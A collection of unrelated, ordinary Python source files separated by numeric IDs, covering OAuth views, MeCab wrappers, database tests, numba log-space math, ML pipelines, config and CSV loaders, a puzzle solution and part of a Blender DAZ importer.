plugin = request.plugins["foursquare"]
client = plugin.get_client()
redirect_url = request.build_absolute_uri(reverse("plugin-foursquare-callback"))
url = client.get_authorization_url(redirect_url)
return redirect(url)
@login_required
def auth_callback(request):
plugin = request.plugins["foursquare"]
client = plugin.get_client()
code = request.GET.get("code")
redirect_url = request.build_absolute_uri(reverse("plugin-foursquare-callback"))
token = client.handle_authorization_callback(code, redirect_url)
profile = client.users(token)
if not profile or not profile.get("user"):
messages.error(request, "Unexpected profile response.")
else:
profile = profile["user"]
plugin.save_user_profile(request.user, profile)
plugin.save_user_token(request.user, token)
username = "%s %s" % (profile.get("firstName"), profile.get("lastName"))
messages.success(request, "Successfully linked to foursquare user %s" % username)
return redirect("account-plugin-settings", plugin_name="foursquare")
|
456243
|
import sys
from ._C import mecab_cost_train, mecab_dict_gen, mecab_dict_index, mecab_main, mecab_system_eval, mecab_test_gen
def run_mecab_main(argv=sys.argv):
mecab_main(argv)
def run_mecab_dict_index(argv=sys.argv):
mecab_dict_index(argv)
def run_mecab_dict_gen(argv=sys.argv):
mecab_dict_gen(argv)
def run_mecab_cost_train(argv=sys.argv):
mecab_cost_train(argv)
def run_mecab_system_eval(argv=sys.argv):
mecab_system_eval(argv)
def run_mecab_test_gen(argv=sys.argv):
mecab_test_gen(argv)
|
456351
|
from PyFlow.UI.Canvas.UINodeBase import UINodeBase
from PyFlow.Packages.PyFlowOpenCv.UI.UIOpenCvBaseNode import UIOpenCvBaseNode
from PyFlow.Packages.PyFlowOpenCv.UI.UICv_TransformNode import UICv_TransformNode
def createUINode(raw_instance):
if raw_instance.__class__.__name__ == "cv_Transform":
return UICv_TransformNode(raw_instance)
return UIOpenCvBaseNode(raw_instance)
|
456357
|
from datetime import date
from decimal import Decimal
from django.db.models.fields.files import ImageFieldFile, FileField
class BaseSerializer(object):
def serialize(self, value):
return value
class DateSerializer(BaseSerializer):
def serialize(self, value):
return str(value)
class DecimalSerializer(BaseSerializer):
def serialize(self, value):
return str(value)
class FileSerializer(BaseSerializer):
def serialize(self, value):
try:
return value.url
except:
return None
def serialize_field(value):
if isinstance(value, date):
return DateSerializer().serialize(value)
if isinstance(value, Decimal):
return DateSerializer().serialize(value)
if isinstance(value, ImageFieldFile) or isinstance(value, FileField):
return FileSerializer().serialize(value)
return value
|
456370
|
import multiprocessing
import os
import pickle
import tempfile
import time
import unittest
import uuid
from hypothesis import given
from hypothesis.strategies import text
try:
import pymongo
except ImportError:
pymongo = None
from chocolate import SQLiteConnection, MongoDBConnection, DataFrameConnection, Space, uniform, QuasiRandom
if pymongo is not None:
client = pymongo.MongoClient("mongodb://localhost:27017/", serverSelectionTimeoutMS=5)
try:
client.server_info()
except pymongo.errors.ServerSelectionTimeoutError:
mongodb = False
else:
mongodb = True
def lock_db(conn_class, *args):
conn = conn_class(*args)
with conn.lock():
time.sleep(1)
class Base(object):
def test_lock(self):
p = multiprocessing.Process(target=lock_db, args=(self.conn_func,) + self.conn_args)
p.start()
timeout = False
start_time = time.time()
while time.time() - start_time < 10:
try:
with self.conn.lock(timeout=0.1):
pass
except TimeoutError:
timeout = True
break
time.sleep(0.1)
p.join()
self.assertEqual(timeout, True)
def test_reentrant_lock(self):
with self.conn.lock(timeout=1):
with self.conn.lock(timeout=1):
pass
def test_results(self):
data = [{"abc": 0, "def": 2}, {"abc": 1}, {"def": 42, "abc": 67, "hij": 23}]
for d in data:
self.conn.insert_result(d)
res = self.conn.all_results()
self.assertEqual(len(data), len(res))
self.assertEqual(len(data), self.conn.count_results())
res = sorted(res, key=lambda d: d["abc"])
data = sorted(data, key=lambda d: d["abc"])
for r, d in zip(res, data):
for k, v in d.items():
self.assertIn(k, r)
self.assertEqual(v, r[k])
res = self.conn.find_results({"abc": 67})
self.assertEqual(1, len(res))
self.assertIn("hij", res[0])
self.assertIn("def", res[0])
self.assertIn("abc", res[0])
def test_update_result(self):
data = {"abc": 0, "def": 2}
token = {"_chocolate_id": 0}
entry = data.copy()
entry["loss"] = None
entry.update(token)
self.conn.insert_result(entry)
values = {"_loss": 0.98}
self.conn.update_result(token, values)
res = self.conn.all_results()[0]
self.assertEqual(values["_loss"], res["_loss"])
def test_complementaries(self):
data = [{"abc": 0, "def": 2}, {"abc": 1}, {"def": 42, "abc": 67}]
for d in data:
self.conn.insert_complementary(d)
res = self.conn.all_complementary()
self.assertEqual(len(data), len(res))
res = sorted(res, key=lambda d: d["abc"])
data = sorted(data, key=lambda d: d["abc"])
for r, d in zip(res, data):
for k, v in d.items():
self.assertIn(k, r)
self.assertEqual(v, r[k])
res = self.conn.find_complementary(data[2])
self.assertEqual(res["abc"], data[2]["abc"])
def test_space(self):
s = {"a": uniform(1, 2),
"b": {"c": {"c1": uniform(0, 5)},
"d": {"d1": uniform(0, 6)}}}
space = Space(s)
space_read = self.conn.get_space()
self.assertEqual(space_read, None)
self.conn.insert_space(space)
space_read = self.conn.get_space()
self.assertEqual(space, space_read)
self.assertRaises(AssertionError, self.conn.insert_space, space)
def test_conditional_space(self):
u = uniform(0.0, 2)
l = uniform(1, 4)
qu = uniform(0.01, 1)
ql = uniform(5, 10)
s = [{"k1" : "a", "k2" : "b",
"a" : u,
"b" : l},
{"k1" : "a", "k2" : "c",
"a" : qu,
"c" : ql}]
space = Space(s)
space_read = self.conn.get_space()
self.assertEqual(space_read, None)
self.conn.insert_space(space)
space_read = self.conn.get_space()
self.assertEqual(space, space_read)
self.assertRaises(AssertionError, self.conn.insert_space, space)
def test_clear(self):
self.conn.insert_result({"foo": "bar"})
self.conn.insert_complementary({"bar": "spam", "foo": 2})
self.conn.insert_space("some_data")
self.conn.clear()
self.assertEqual(self.conn.count_results(), 0)
self.assertEqual(self.conn.all_complementary(), [])
self.assertEqual(self.conn.get_space(), None)
def test_pop_id(self):
entry = {"foo": "bar", "bar": "spam", "_loss" : 0.1}
self.conn.insert_result(entry)
results = self.conn.find_results({})
for doc in results:
doc = self.conn.pop_id(doc)
self.assertEqual(doc, entry)
self.conn.insert_complementary(entry)
comp = self.conn.find_complementary({})
comp = self.conn.pop_id(comp)
self.assertEqual(comp, entry)
class TestSQLite(unittest.TestCase, Base):
def setUp(self):
self.tmp_dir = tempfile.TemporaryDirectory()
self.db_name = "tmp.db"
self.engine_str = "sqlite:///{}".format(os.path.join(self.tmp_dir.name, self.db_name))
self.conn = SQLiteConnection(self.engine_str)
self.conn_func = SQLiteConnection
self.conn_args = (self.engine_str,)
def tearDown(self):
self.tmp_dir.cleanup()
def test_empty_name_connect(self):
engine_str = "sqlite:///{}".format(os.path.join(self.tmp_dir.name, ""))
self.assertRaises(RuntimeError, SQLiteConnection, engine_str)
@given(text(alphabet="/ "))
def test_invalid_ending_name_connect(self, s):
engine_str = "sqlite:///{}".format(os.path.join(self.tmp_dir.name, s))
self.assertRaises(RuntimeError, SQLiteConnection, engine_str)
def test_no_uri_connect(self):
engine_str = os.path.join(self.tmp_dir.name, self.db_name)
self.assertRaises(RuntimeError, SQLiteConnection, engine_str)
def test_memory_raises(self):
engine_str = "sqlite:///:memory:"
self.assertRaises(RuntimeError, SQLiteConnection, engine_str)
@unittest.skipIf(pymongo is None, "Cannot find pymongo module")
@unittest.skipIf(mongodb == False, "Cannot cannot connect to mongodb://localhost:27017/")
class TestMongoDB(unittest.TestCase, Base):
def setUp(self):
self.db_name = str(uuid.uuid1())
self.engine_str = "mongodb://localhost:27017/"
self.conn = MongoDBConnection(self.engine_str, database=self.db_name)
self.conn_func = MongoDBConnection
self.conn_args = (self.engine_str, self.db_name)
def tearDown(self):
self.conn.client.drop_database(self.db_name)
class TestDataFrame(unittest.TestCase, Base):
def setUp(self):
self.conn = DataFrameConnection()
def test_lock(self):
pass
def test_pickle(self):
data = [{"abc": 0, "def": 2}, {"abc": 1}, {"def": 42, "abc": 67, "hij": 23}]
comp = [{"abc": 0, "def": 2}, {"abc": 1}, {"def": 42, "abc": 67, "hij": 23}]
space = {"a": uniform(1, 2),
"b": {"c": {"c1": uniform(0, 5)},
"d": {"d1": uniform(0, 6)}}}
for d in data:
self.conn.insert_result(d)
for c in comp:
self.conn.insert_complementary(c)
self.conn.insert_space(Space(space))
s = pickle.dumps(self.conn)
l = pickle.loads(s)
self.assertEqual(self.conn.results.equals(l.results), True)
self.assertEqual(self.conn.complementary.equals(l.complementary), True)
self.assertEqual(l.space, self.conn.space)
|
456373
|
class CandidateDescriptor(object):
"""
Descriptor that defines an candidate the solver wants to be checked.
It is used to lable/identify the candidates and their results in the case of batch processing.
"""
def __init__(self, **definingValues):
"""
@param definingValues Class assumes that all variables passed to the computer are parameters of the candidate
the instance should represent.
"""
import uuid
self._definingValues = definingValues
self._definingStr = str()
for item in sorted(definingValues.items()):
self._definingStr = self._definingStr + "'" + str(item[0]) + "':'" + str(item[1]) + "',"
self.ID = str(uuid.uuid4())
def __missing__(self, key):
return None
def __len__(self):
return len(self._definingValues)
def __contains__(self, key):
return key in self._definingValues
def __eq__(self, other):
if isinstance(other, self.__class__):
return self._definingValues == other._definingValues
else:
return False
def __hash__(self):
return hash(self._definingStr)
def __ne__(self, other):
return not self.__eq__(other)
def __repr__(self):
return 'EvalInstanceDescriptor(%s)' % (self._definingValues)
def __str__(self):
return '(%s)' % (self._definingValues)
def keys(self):
return self._definingValues.keys()
def __getitem__(self, key):
if key in self._definingValues:
return self._definingValues[key]
raise KeyError('Unkown defining value key was requested. Key: {}; self: {}'.format(key, self))
def get_values(self):
return self._definingValues
class CandicateDescriptorWrapper:
class InternalCandidateValueWrapper:
def __init__(self, value_list):
self._value_list = value_list
def __gt__(self, other):
boundary_condition = True
for value in self._value_list:
if value > other:
continue
else:
boundary_condition = False
break
return boundary_condition
def __lt__(self, other):
boundary_condition = True
for value in self._value_list:
if value < other:
continue
else:
boundary_condition = False
break
return boundary_condition
def get(self):
return self._value_list
def __init__(self, keys):
self._cand = None
self._keys = keys
def __iter__(self):
return iter(self._cand)
def __getitem__(self, key):
return self.InternalCandidateValueWrapper([x[key] for x in self._cand])
def keys(self):
return self._keys
def set(self, obj):
self._cand = obj
def get(self):
return self._cand
|
456470
|
from asgiref.sync import async_to_sync
from channels.layers import get_channel_layer
def sysMsg(channel_name, msg_type, not_level, content={}):
"""
Notify system message to channel
"""
channel_layer = get_channel_layer()
async_to_sync(channel_layer.group_send)(
channel_name,
{
'type': 'notify.system_message',
'msg_type': msg_type,
'not_level': not_level,
**content
},
)
|
456489
|
from numba import njit, boolean, int64, float64
from numba.experimental import jitclass
import numpy as np
from .utils import isin
@jitclass([
('value', float64[:]),
('sign', float64[:]),
('size', int64)
])
class signed:
def __init__(self, value, sign=None):
""" If sign is None, init from value in 'linear' space, possibly negative.
Else, init from value in log-space.
"""
if sign is None:
self.value = np.log(np.absolute(value))
self.sign = np.sign(value).astype(np.float64)
else:
self.value = value
self.sign = sign
self.size = len(value)
self.sign[self.value==-np.Inf] = 0.
def exp(self, exp):
""" Exponentiate signed value by exp.
Operates in log-space.
"""
value = self.value*exp
return signed(value, self.sign)
def nonpositive(self):
return self.sign <= 0
def nonnegative(self):
return self.sign >= 0
def nonzero(self):
return (self.value > -np.Inf) & (self.sign != 0)
def linear(self):
return self.sign * np.exp(self.value)
def argsort(self, increasing=True):
negatives = np.zeros(self.size, dtype=boolean)
order_positives = []
order_negatives = []
for i in range(self.size):
if self.sign[i] < 0:
negatives[i] = 1
order_negatives.append(i)
else:
order_positives.append(i)
if increasing:
delta = 1
else:
delta = -1
order_negatives = np.asarray([x for x, y in sorted(zip(order_negatives, -delta*self.value[negatives]), key = lambda x: x[1])])
order_positives = np.asarray([x for x, y in sorted(zip(order_positives, delta*self.value[~negatives]), key = lambda x: x[1])])
if increasing:
return np.concatenate((order_negatives, order_positives))
else:
return np.concatenate((order_positives, order_negatives))
def get(self, i):
assert i < self.size, "Index out of range."
return signed(self.value[i:i+1], self.sign[i:i+1])
def insert(self, sig, i):
assert i < self.size, "Index out of range."
assert sig.size == 1, "Can only insert signed with size 1."
self.value[i] = sig.value[0]
self.sign[i] = sig.sign[0]
def reduce(self):
if self.size == 1:
return self
max_i = np.argmax(self.value)
if np.isinf(self.value[max_i]):
return self.get(max_i)
indicators = np.ones(self.size, dtype=boolean)
indicators[max_i] = 0
r = np.sum(np.exp(self.value[indicators] - self.value[max_i])*(self.sign[indicators]*self.sign[max_i]))
if r < -1.:
return signed(np.asarray([self.value[max_i]]) + np.log(-1.-r), np.asarray([-self.sign[max_i]]))
res = signed(np.asarray([self.value[max_i]]) + np.log(r+1), np.asarray([self.sign[max_i]]))
return res
@njit
def signed_join(x, y):
if x is None:
return y
if y is None:
return x
return signed(np.concatenate((x.value, y.value)),
np.concatenate((x.sign, y.sign)))
@njit
def signed_prod(x, y):
res = signed(x.value + y.value, x.sign * y.sign)
if res.value[0] == -np.Inf: res.sign[0] = 0.
return res
@njit
def signed_sum_vec(x, y):
if x.size == y.size:
values = np.zeros(x.size)
signs = np.zeros(x.size)
for i in range(x.size):
sum_ = signed_sum(x.get(i), y.get(i))
values[i], signs[i] = sum_.value[0], sum_.sign[0]
else:
assert x.size == 1 or y.size == 1, 'If sizes do not match, only 1D arrays can be propagated.'
if x.size == 1:
values = np.zeros(y.size)
signs = np.zeros(y.size)
for i in range(y.size):
sum_ = signed_sum(x.get(0), y.get(i))
values[i], signs[i] = sum_.value[0], sum_.sign[0]
else:
values = np.zeros(x.size)
signs = np.zeros(x.size)
for i in range(x.size):
sum_ = signed_sum(x.get(i), y.get(0))
values[i], signs[i] = sum_.value[0], sum_.sign[0]
return signed(values, signs)
@njit
def signed_sum(x, y):
assert (x.size == 1) & (y.size == 1), "Arrays must be one-dimensional."
max_value = max(x.value[0], y.value[0])
if max_value == x.value[0]:
max_, min_ = x, y
else:
max_, min_ = y, x
if np.isinf(max_value):
return max_
r = np.sum(np.exp(min_.value - max_.value)*(min_.sign*max_.sign))
if r < -1.:
return signed(max_.value + np.log(-1.-r), -max_.sign)
res = signed(max_.value + np.log(r+1), max_.sign)
if res.value[0] == -np.Inf: res.sign[0] = 0.
return res
@njit
def signed_max_vec(x, y):
assert x.size == y.size, "Both arrays should have the same size."
values = np.zeros(x.size)
signs = np.zeros(x.size)
for i in range(x.size):
max_ = signed_max(x.get(i), y.get(i))
values[i], signs[i] = max_.value[0], max_.sign[0]
return signed(values, signs)
@njit
def signed_min_vec(x, y):
assert x.size == y.size, "Both arrays should have the same size."
values = np.zeros(x.size)
signs = np.zeros(x.size)
for i in range(x.size):
min_ = signed_min(x.get(i), y.get(i))
values[i], signs[i] = min_.value[0], min_.sign[0]
return signed(values, signs)
@njit
def signed_max(x, y):
xs = x.sign[0]
ys = y.sign[0]
if xs > ys: return x
if ys > xs: return y
if ys*y.value[0] > xs*x.value[0]: return y
return x
@njit
def signed_min(x, y):
xs = x.sign[0]
ys = y.sign[0]
if xs > ys: return y
if ys > xs: return x
if ys*y.value[0] > xs*x.value[0]: return x
return y
@njit
def signed_econtaminate(vec, signed_logprs, eps, ismax):
econt = np.asarray(vec) * (1-eps)
room = 1 - np.sum(econt)
if ismax:
order = signed_logprs.argsort(False)
else:
order = signed_logprs.argsort(True)
for i in order:
if room > eps:
econt[i] = econt[i] + eps
room -= eps
else:
econt[i] = econt[i] + room
break
return signed(econt, None)
|
456496
|
from creme import stream
from . import base
class ChickWeights(base.FileDataset):
"""Chick weights along time.
The stream contains 578 items and 3 features. The goal is to predict the weight of each chick
along time, according to the diet the chick is on. The data is ordered by time and then by
chick.
References:
1. [Chick weight dataset overview](http://rstudio-pubs-static.s3.amazonaws.com/107631_131ad1c022df4f90aa2d214a5c5609b2.html)
"""
def __init__(self):
super().__init__(filename='chick-weights.csv', n_samples=578, n_features=3, task=base.REG)
def __iter__(self):
return stream.iter_csv(
self.path,
target='weight',
converters={'time': int, 'weight': int, 'chick': int, 'diet': int}
)
|
456551
|
from zope.interface import implements
from twisted.plugin import IPlugin
from twisted.application.service import IServiceMaker
from twisted.application import internet
from oauth_proxy import oauth_proxy
class OAuthProxyServiceMaker(object):
implements(IServiceMaker, IPlugin)
tapname = "oauth_proxy"
description = "OAuth HTTP proxy"
options = oauth_proxy.Options
def makeService(self, options):
# TODO add error handling for missing params
useSSL = options["ssl"]
consumerKey = options["consumer-key"]
consumerSecret = options["consumer-secret"]
if options.has_key("token") and options.has_key("token-secret"):
token = options["token"]
tokenSecret = options["token-secret"]
else:
token = tokenSecret = None
port = int(options["port"])
credentials = oauth_proxy.OAuthCredentials(consumerKey, consumerSecret, token, tokenSecret)
credentialProvider = oauth_proxy.StaticOAuthCredentialProvider(credentials)
return internet.TCPServer(port, oauth_proxy.OAuthProxyFactory(credentialProvider, useSSL))
serviceMaker = OAuthProxyServiceMaker()
|
456617
|
import tensorflow as tf
import copy
from icecaps.estimators.estimator_chain import EstimatorChain
from icecaps.estimators.seq2seq_encoder_estimator import Seq2SeqEncoderEstimator
from icecaps.estimators.seq2seq_decoder_estimator import Seq2SeqDecoderEstimator
class Seq2SeqEstimator(EstimatorChain):
def __init__(self, model_dir="/tmp", params=dict(), config=None, scope="", is_mmi_model=False):
self.encoder = Seq2SeqEncoderEstimator(
model_dir, params, config=config, scope=scope+"/encoder")
self.decoder = Seq2SeqDecoderEstimator(
model_dir, params, config=config, scope=scope+"/decoder", is_mmi_model=is_mmi_model)
super().__init__([self.encoder, self.decoder],
model_dir, params, config, scope)
@classmethod
def list_params(cls, expected_params=None):
print("Seq2Seq Encoder:")
Seq2SeqEncoderEstimator.list_params(expected_params)
print()
print("Seq2Seq Decoder:")
Seq2SeqDecoderEstimator.list_params(expected_params)
print()
|
456661
|
import ConfigParser
import string
_ConfigDefault = {
"database.dbms": "mysql",
"database.name": "",
"database.user": "root",
"database.password": "",
"database.host": "127.0.0.1"
}
def LoadConfig(file, config={}):
"""
returns a dictionary with key's of the form
<section>.<option> and the values
"""
config = config.copy()
cp = ConfigParser.ConfigParser()
cp.read(file)
for sec in cp.sections():
name = string.lower(sec)
for opt in cp.options(sec):
config[name + "." + string.lower(opt)] = string.strip(cp.get(sec, opt))
return config
if __name__=="__main__":
print LoadConfig("some.ini", _ConfigDefault)
|
456683
|
from paddleflow.pipeline import Pipeline
from paddleflow.pipeline import ContainerStep
from paddleflow.pipeline import Parameter
from paddleflow.pipeline import Artifact
from paddleflow.pipeline import CacheOptions
from paddleflow.pipeline import PF_USER_NAME
def job_info():
return {
"PF_JOB_TYPE": "vcjob",
"PF_JOB_MODE": "Pod",
"PF_JOB_QUEUE_NAME": "ppl-queue",
"PF_JOB_FLAVOUR": "flavour1",
}
def preprocess(data_path):
cache = CacheOptions(
enable=True,
max_expired_time=300,
fs_scope="cache_example/shells/data_artifact.sh"
)
return ContainerStep(
name="preprocess",
parameters={"data_path": data_path},
outputs={"train_data": Artifact(), "validate_data": Artifact()},
docker_env="centos:centos7",
cache_options=cache,
command="bash -x cache_example/shells/data_artifact.sh {{data_path}} {{train_data}} {{validate_data}}",
env={"USER_ABC": f"123_{PF_USER_NAME}"}
)
def train(epoch, train_data):
return ContainerStep(
name="train",
parameters={
"epoch": epoch,
},
inputs={"train_data": train_data},
outputs={"train_model": Artifact()},
command="bash -x cache_example/shells/train.sh {{epoch}} {{train_data}} {{train_model}}",
)
def validate(data, model):
cache = CacheOptions(
enable=False,
)
return ContainerStep(
name="validate",
inputs={"data":data, "model": model},
command="bash cache_example/shells/validate.sh {{model}}",
cache_options=cache,
)
cache = CacheOptions(
enable=True,
max_expired_time=600,
fs_scope="cache_example/shells/train.sh,cache_example/shells/validate.sh,cache_example/shells/data_artifact.sh"
)
@Pipeline(
name="cache_example",
docker_env="nginx:1.7.9",
cache_options=cache,
env=job_info(),
parallelism=1
)
def cache_example(data_path, epoch):
preprocess_step = preprocess(data_path)
train_step = train(epoch, preprocess_step.outputs["train_data"])
validate_step = validate(preprocess_step.outputs["validate_data"], train_step.outputs["train_model"])
if __name__ == "__main__":
ppl = cache_example(data_path="./cache_example/data/", epoch=15)
result = ppl.run(fsname="your_fs_name")
print(result)
|
456714
|
import configs_and_settings
import csv
import os
# C:\Users\Xavier\LSTMforSHM\data\time_series_datasets\csv_data_test_file.csv
# csv_file_path = r"C:\Users\Xavier\LSTMforSHM\data\time_series_datasets\csv_data_test_file.csv"
csv_file_path = r"C:\Users\Xavier\LSTMforSHM\data\csv_data\csv_data_test_file123.csv"
def read_csv_file(csv_file_path):
csv_data_row_elements = []
with open(csv_file_path, "r") as csv_file:
reader = csv.reader(csv_file, delimiter=';')
# len(reader)
for row in reader:
csv_data_row_elements.append(row)
print(', '.join(row))
return csv_data_row_elements
def read_csv_file_2_dict(csv_file_path):
csv_data_row_elements = []
with open(csv_file_path) as csv_file:
csv_dict_reader = csv.DictReader(csv_file, delimiter=';')
print(csv_dict_reader.fieldnames)
fieldnames_keys = csv_dict_reader.fieldnames
for row in csv_dict_reader:
csv_data_row_elements.append(row)
# print(row)
# print(row["Country"])
return csv_data_row_elements
# res1 = read_csv_file(csv_file_path)
res2 = read_csv_file_2_dict(csv_file_path)
# print(res1)
print(res2)
|
456738
|
import fileinput
from itertools import count
def slice_to_str(slice):
return ''.join(str(n) for n in slice)
INPUT = int(fileinput.input()[0])
input_str = str(INPUT)
input_len = len(input_str)
recipes = [3, 7]
recipes_len = 2
elf_1 = 0
elf_2 = 1
part_1 = None
part_2 = None
while part_1 is None or part_2 is None:
score = recipes[elf_1] + recipes[elf_2]
if score >= 10:
recipes.append(score // 10)
recipes.append(score % 10)
recipes_len += 2
else:
recipes.append(score)
recipes_len += 1
elf_1 = (elf_1 + recipes[elf_1] + 1) % recipes_len
elf_2 = (elf_2 + recipes[elf_2] + 1) % recipes_len
if part_1 is None and recipes_len > INPUT + 10:
part_1 = slice_to_str(recipes[INPUT:INPUT+10])
if part_2 is None:
if score >= 10 and slice_to_str(recipes[-1-input_len:-1]) == input_str:
part_2 = recipes_len - input_len - 1
if slice_to_str(recipes[-input_len:]) == input_str:
part_2 = recipes_len - input_len
print "Scores of recipes after puzzle input:", part_1
print "Number of recipes before puzzle input:", part_2
|
456770
|
import bpy
import os
import math
import json
from copy import deepcopy
from . import DataBase
from . import Versions
from . import Util
bUsePrincipledMat = True
isHighHeel = False
bRotationLimit = False
bLimitOnTwist = True
bUseCustomBone = False
bUseDrivers = False
#remove shape key from all wearable things, not just cloth
bRemoveShapeKeyFromWearable = True
# not used
bRemoveShapeKeyDrivers = False
bJoinEyelashToBody = True
bConvertBumpToNormal = False
bReuseNormal = True
# rate between Blender's Subsurface and iray's Translucency Weight
sss_rate = 0.1
isMan = False
root = ""
isGen = False
_AMTR = ""
_BODY = ""
_EYLS = ""
_HAIR = ""
_TEAR = ""
_RGFY = ""
keep_EYLS = ""
keep_TEAR = ""
db = DataBase.DB()
updated_bone_limits = []
dtu = None
Geo_Idx = 0
now_ary = []
pst_ary = []
_BVCount = 0
_SIZE = 0
root = ""
config = ""
_ISG3 = 0
_HOMETOWN = ""
_ASSETNAME = ""
already_use_newmtl = []
_ENVROOT = ""
shape_key_custom_props = []
G3_GEOIDX = 3
#####Female#######
# 0.G8
# 1.DazGenitalA (20200525-)
# 2.DazGenitalB
# 3.G3
######Male##########
# 0.G8
# 1.DazGenitalA(20200525-)
# 2.DazGenitalB
# G3
max_vs = [
[
[16556, 65806, 262514],
[17192, 68350, 272690],
[17292, 68450, 272790],
[17418, 68744, 273396],
],
[
[16384, 65118, 259762],
[17454, 69398, 276882],
[17543, 69498, 276982],
[17246, 68056, 270644],
],
]
IS_EMERGENCY = False
EYLSCOUNT = 464
def get_children(object):
children = []
for ob in bpy.data.objects:
if ob.parent == object:
children.append(ob)
return children
def get_shape_key_custom_props():
fig_object_name = bpy.context.window_manager.choose_daz_figure
if fig_object_name == "null":
return []
if fig_object_name not in bpy.data.objects.keys():
return []
fig_object = bpy.data.objects[fig_object_name]
children = get_children(fig_object)
custom = []
for child in children:
if "_RNA_UI" in child.keys():
morphs = child["_RNA_UI"].keys()
custom.append({"mesh": child.name, "props": morphs})
return custom
def getMyMax3():
return max_vs[getSex()][get_geo_idx()]
def getIsG3():
return get_geo_idx() == G3_GEOIDX
def getIsEmergency():
return IS_EMERGENCY
def setItsEmergency():
global IS_EMERGENCY
IS_EMERGENCY = True
def isAcs():
wk = bpy.context.window_manager.search_prop
wk = wk.strip()
wk = wk.lower()
return wk == "#accessory"
def getSubdivLevel():
naga = len(getBody().data.vertices)
if naga > 200000:
return 2
elif naga > 60000:
return 1
else:
return 0
def get_root():
return root
def getSex():
if getIsMan():
return 1
else:
return 0
def isExistsAnimation():
if getAmtr() is None:
return False
my_amtr = getAmtr()
if my_amtr.animation_data is None:
return False
if my_amtr.animation_data.action is None:
return False
if my_amtr.animation_data.action.fcurves is None:
return False
if len(my_amtr.animation_data.action.fcurves) <= 0:
return False
return True
def orthopedic_sharp(word):
word = word.replace(" ", "")
word = word.lower()
return word
def isRiggedObject(dobj):
if dobj.type == "MESH":
for modifier in dobj.modifiers:
if modifier.type == "ARMATURE" and modifier.object is not None:
if (
modifier.object.name == get_Amtr_name()
or modifier.object.name == get_Rgfy_name()
):
return True
return False
def isRiggedObject_when_Amtr_is_None(dobj):
if dobj.type == "MESH":
for modifier in dobj.modifiers:
if modifier.type == "ARMATURE":
return True
return False
def store_ary(is_now):
global now_ary
global pst_ary
if is_now == False:
now_ary = []
pst_ary = []
for d in Util.myccobjs():
if is_now:
now_ary.append(d.name)
else:
pst_ary.append(d.name)
def what_new():
if len(now_ary) - len(pst_ary) < 1:
return ""
for n in now_ary:
hit = False
if n not in pst_ary:
return n
return ""
def setOpsMode(arg):
combi = ["POSE", "EDIT", "OBJECT", "SCULPT"]
if arg in combi:
if Versions.get_active_object() is not None:
if Versions.get_active_object().mode != arg:
bpy.ops.object.mode_set(mode=arg)
def get_Amtr_name():
if _AMTR != "" and (_AMTR in Util.allobjs()):
return _AMTR
else:
return ""
def get_Body_name():
if _BODY != "" and (_BODY in Util.allobjs()):
return _BODY
else:
return ""
def get_Eyls_name():
if _EYLS != "" and (_EYLS in Util.allobjs()):
return _EYLS
else:
return ""
def get_Tear_name():
if _TEAR != "" and (_TEAR in Util.allobjs()):
return _TEAR
else:
return ""
def get_Hair_name():
if _HAIR != "" and (_HAIR in Util.allobjs()):
return _HAIR
else:
return ""
def get_KeepEyls_name():
return keep_EYLS
def get_KeepTear_name():
return keep_TEAR
def get_Rgfy_name():
if _RGFY != "" and (_RGFY in Util.allobjs()):
return _RGFY
else:
return ""
def getIsMan():
return isMan
def getIsGen():
return isGen
def getIsEyls():
return _EYLS != ""
def getIsTEAR():
return _TEAR != ""
def getIsHair():
return _HAIR != ""
def setEylsIsJoined():
global _EYLS
_EYLS = ""
def setTearIsJoined():
global _TEAR
_TEAR = ""
def find_RGFY_all():
for d in Util.myccobjs():
if find_RGFY(d):
return True
return False
def getFileSp():
if os.name == "nt":
return "\\"
else:
return "/"
def find_RGFY(dobj):
global _RGFY
if dobj.type == "ARMATURE":
abones = dobj.data.bones
if len(abones) > 600:
list = ["ORG-", "DEF-", "MCH-", 0, 0, 0]
for ab in abones:
for i in range(3):
if ab.name.startswith(list[i]):
list[i + 3] += 1
if list[3] > 100 and list[4] > 100 and list[5] > 70:
_RGFY = dobj.name
_AMTR = ""
return True
return False
# TODO: Find a method to get Armature Necessary when Rigify is Ran
def find_AMTR(dobj):
global _AMTR
if dobj.type == "ARMATURE" and "Genesis" in dobj.name:
_AMTR = dobj.name
return True
return False
def find_amtr(dobj):
global dtu
import_name = dtu.get_import_name()
global _AMTR
if dobj.type == "ARMATURE" and import_name in dobj.name:
_AMTR = dobj.name
return True
return False
def find_BODY(dobj):
global _BODY
if dobj.type == "MESH":
if Versions.isHide(dobj):
return False
for modifier in dobj.modifiers:
if modifier.type == "ARMATURE" and modifier.object is not None:
if modifier.object.name == _AMTR or modifier.object.name == _RGFY:
figure_name = dobj.name.replace(".Shape", "")
figure_name = figure_name.split(".")[0]
if figure_name in [
"Genesis8Female",
"Genesis8Male",
"Genesis8_1Male",
"Genesis8_1Female",
"Genesis3Male",
"Genesis3Female",
"Genesis2Female",
"Genesis2Male",
"Genesis",
]:
_BODY = dobj.name
return True
return False
def load_dtu(dtu_to_load):
global dtu
dtu = dtu_to_load
# new find body used for importing
def find_body(dobj):
global dtu
import_name = dtu.get_import_name()
global _BODY
if dobj.type == "MESH":
if Versions.isHide(dobj):
return False
for modifier in dobj.modifiers:
if modifier.type == "ARMATURE" and modifier.object is not None:
if modifier.object.name == _AMTR or modifier.object.name == _RGFY:
figure_name = dobj.name.replace(".Shape", "")
figure_name = figure_name.split(".")[0]
if figure_name == import_name:
_BODY = dobj.name
return True
return False
def get_children(obj):
children = []
col = Util.getUsersCollection(obj)
for ob in Util.colobjs(col.name):
if ob.parent == obj:
children.append(ob)
return children
def find_Both(obj):
if obj.type == "MESH":
for modifier in obj.modifiers:
if modifier.type == "ARMATURE" and modifier.object is not None:
if find_AMTR(modifier.object) == False:
if find_RGFY(modifier.object) == False:
return False
return find_BODY(obj)
elif obj.type == "ARMATURE":
if find_AMTR(obj) or find_RGFY(obj):
kids = get_children(obj)
for k in kids:
if find_BODY(k):
return True
return False
return False
# TODO: Fix Logic of Combination of Tears
def find_EYLS(dobj):
global _EYLS
global keep_EYLS
if isRiggedObject(dobj):
if "Eyelashes" in dobj.name:
_EYLS = dobj.name
keep_EYLS = deepcopy(dobj.name)
return True
return False
def find_TEAR(dobj):
global _TEAR
global keep_TEAR
if "Tear" in dobj.name:
_TEAR = dobj.name
keep_TEAR = deepcopy(dobj.name)
return True
return False
def find_HAIR(dobj):
global _HAIR
if isRiggedObject(dobj):
if ("brow" in dobj.name.lower()) == False:
hi = 0
count = [0, 0]
if getBody() is not None:
cnt = 0
